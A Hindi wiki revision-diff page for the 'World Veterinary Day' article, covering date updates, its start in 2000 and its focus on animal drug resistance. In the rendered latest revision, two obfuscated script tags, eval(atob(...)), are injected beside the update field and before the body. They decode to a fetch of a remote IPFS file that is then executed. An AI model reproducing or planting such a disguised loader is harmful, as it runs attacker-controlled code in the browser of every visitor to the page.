Difference between revisions of "विश्व पशु चिकित्सा दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by one other user not shown)
Line 4: Line 4:
 
|विवरण='''विश्व पशु चिकित्सा दिवस''' प्रत्येक वर्ष [[अप्रैल]] महीने का अंतिम [[शनिवार]] को मनाया जाता है।
 
|विवरण='''विश्व पशु चिकित्सा दिवस''' प्रत्येक वर्ष [[अप्रैल]] महीने का अंतिम [[शनिवार]] को मनाया जाता है।
 
|शीर्षक 1=तिथि
 
|शीर्षक 1=तिथि
|पाठ 1=[[30 अप्रॅल]] (वर्ष [[2016]])
+
|पाठ 1=[[29 अप्रॅल]] (वर्ष [[2023]])
 
|शीर्षक 2=शुरुआत
 
|शीर्षक 2=शुरुआत
 
|पाठ 2=वर्ष [[2000]] से विश्व पशु चिकित्सा संघ के द्वारा
 
|पाठ 2=वर्ष [[2000]] से विश्व पशु चिकित्सा संघ के द्वारा
Line 26: Line 26:
 
|अन्य जानकारी=वर्ष [[2010]] में विश्व पशु चिकित्सा दिवस का थीम था- ‘वन वर्ल्ड, वन हेल्थ: पशु चिकित्सकों और चिकित्सकों के बीच ज्यादा सहयोग।
 
|अन्य जानकारी=वर्ष [[2010]] में विश्व पशु चिकित्सा दिवस का थीम था- ‘वन वर्ल्ड, वन हेल्थ: पशु चिकित्सकों और चिकित्सकों के बीच ज्यादा सहयोग।
 
|बाहरी कड़ियाँ=[http://www.worldvet.org/news.php?item=109 आधिकारिक वेबसाइट]
 
|बाहरी कड़ियाँ=[http://www.worldvet.org/news.php?item=109 आधिकारिक वेबसाइट]
|अद्यतन={{अद्यतन|19:44, 3 अप्रॅल 2015 (IST)}}
+
|अद्यतन={{अद्यतन|12:34, 15 जनवरी 2022 (IST)}}
}}
+
}}'''विश्व पशु चिकित्सा दिवस''' ([[अंग्रेज़ी]]: ''World Veterinary Day'') प्रत्येक वर्ष [[अप्रैल]] महीने के अंतिम [[शनिवार]] को मनाया जाता है। वर्ष [[2023]] में यह दिवस अंतिम शनिवार [[29 अप्रॅल]] को मनाया जायेगा। इस दिवस को मनाये जाने का मुख्य उद्देश्य पशुओं के रोगों से सम्बंधित दवाओं पर चर्चा करना तथा उनके प्रति लोगों को जागरूक करना है।
'''विश्व पशु चिकित्सा दिवस''' ([[अंग्रेज़ी]]: ''World Veterinary Day'') प्रत्येक वर्ष [[अप्रैल]] महीने का अंतिम [[शनिवार]] को मनाया जाता है। वर्ष [[2010]] का विश्व पशु चिकित्सा दिवस [[24 अप्रैल]] को मनाया गया जिसका थीम था- ‘वन वर्ल्ड, वन हेल्थ: पशु चिकित्सकों और चिकित्सकों के बीच ज्यादा सहयोग। वर्ष [[2000]] से विश्व पशु चिकित्सा संघ के द्वारा विश्व पशु चिकित्सा दिवस मनाया जा रहा है।
+
==शुरुआत==
 +
वर्ष [[2000]] से विश्व पशु चिकित्सा संघ के द्वारा विश्व पशु चिकित्सा दिवस मनाया जा रहा है। वर्ष [[2010]] का विश्व पशु चिकित्सा दिवस [[24 अप्रैल]] को मनाया गया था, जिसका थीम '''वन वर्ल्ड, वन हेल्थ: पशु चिकित्सकों और चिकित्सकों के बीच ज्यादा सहयोग" थी।
 
==उद्देश्य==
 
==उद्देश्य==
 
विश्व पशु चिकित्सा दिवस के अवसर पर पशु चिकित्सालयों में पशुओं में पाए जाने वाले जीवाणुओं का दवाओं के प्रति प्रतिरोध विषय पर चर्चा की जाती है और लोगों को इस बारे में जागरूक किया जाता है।
 
विश्व पशु चिकित्सा दिवस के अवसर पर पशु चिकित्सालयों में पशुओं में पाए जाने वाले जीवाणुओं का दवाओं के प्रति प्रतिरोध विषय पर चर्चा की जाती है और लोगों को इस बारे में जागरूक किया जाता है।
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 05:33, 1 May 2023

vishv pashu chikitsa divas
vivaran vishv pashu chikitsa divas pratyek varsh aprail mahine ka aantim shanivar ko manaya jata hai.
tithi 29 aprॅl (varsh 2023)
shuruat varsh 2000 se vishv pashu chikitsa sangh ke dvara
uddeshy pashuoan mean pae jane vale jivanuoan ka davaoan ke prati pratirodh vishay par charcha aur bimariyoan ke bare mean logoan ko jagarook karana.
any janakari varsh 2010 mean vishv pashu chikitsa divas ka thim tha- ‘van varld, van helth: pashu chikitsakoan aur chikitsakoan ke bich jyada sahayog.
bahari k diyaan adhikarik vebasait
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>vishv pashu chikitsa divas (aangrezi: World Veterinary Day) pratyek varsh aprail mahine ke aantim shanivar ko manaya jata hai. varsh 2023 mean yah divas aantim shanivar 29 aprॅl ko manaya jayega. is divas ko manaye jane ka mukhy uddeshy pashuoan ke rogoan se sambandhit davaoan par charcha karana tatha unake prati logoan ko jagarook karana hai.

shuruat

varsh 2000 se vishv pashu chikitsa sangh ke dvara vishv pashu chikitsa divas manaya ja raha hai. varsh 2010 ka vishv pashu chikitsa divas 24 aprail ko manaya gaya tha, jisaka thim van varld, van helth: pashu chikitsakoan aur chikitsakoan ke bich jyada sahayog" thi.

uddeshy

vishv pashu chikitsa divas ke avasar par pashu chikitsalayoan mean pashuoan mean pae jane vale jivanuoan ka davaoan ke prati pratirodh vishay par charcha ki jati hai aur logoan ko is bare mean jagarook kiya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh